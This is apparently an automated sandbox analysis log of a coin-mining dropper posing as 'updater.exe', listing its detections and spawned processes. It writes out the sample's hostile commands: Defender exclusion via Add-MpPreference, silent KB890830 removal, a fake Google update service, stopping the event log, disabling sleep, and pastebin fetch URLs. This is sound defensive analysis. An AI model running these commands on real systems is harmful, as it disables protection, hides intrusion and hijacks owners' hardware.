                Source: conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/HpN5DV4T
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/xhASwz5f
                Source: conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/xhASwz5fRunning
                Source: conhost.exe, 00000027.00000003.2152302371.000002862EC26000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/xhASwz5fX
                Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Modifies the hosts file
                Source: C:\Users\user\Desktop\updater.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: Process Memory Space: conhost.exe PID: 5596, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Uses powercfg.exe to modify the power settings
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\conhost.exeCode function: 36_2_0000000140001394 NtQueryInformationFile,36_2_0000000140001394
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\maoxoafwbtki.sysJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_c2tvagps.hao.ps1
                Source: C:\Windows\System32\conhost.exeCode function: 36_2_000000014000325036_2_0000000140003250
                Source: C:\Windows\System32\conhost.exeCode function: 36_2_00000001400027D036_2_00000001400027D0
                Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\maoxoafwbtki.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs updater.exe
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: Process Memory Space: conhost.exe PID: 5596, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@59/13@4/4
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2360:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1864:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1812:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4284:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1848:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6752:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\vazasxarlpknfxrw
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jodddkj1.w0x.ps1Jump to behavior
                Source: updater.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Users\user\Desktop\updater.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: updater.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\updater.exeFile read: C:\Users\user\Desktop\updater.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\updater.exe "C:\Users\user\Desktop\updater.exe"
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe conhost.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
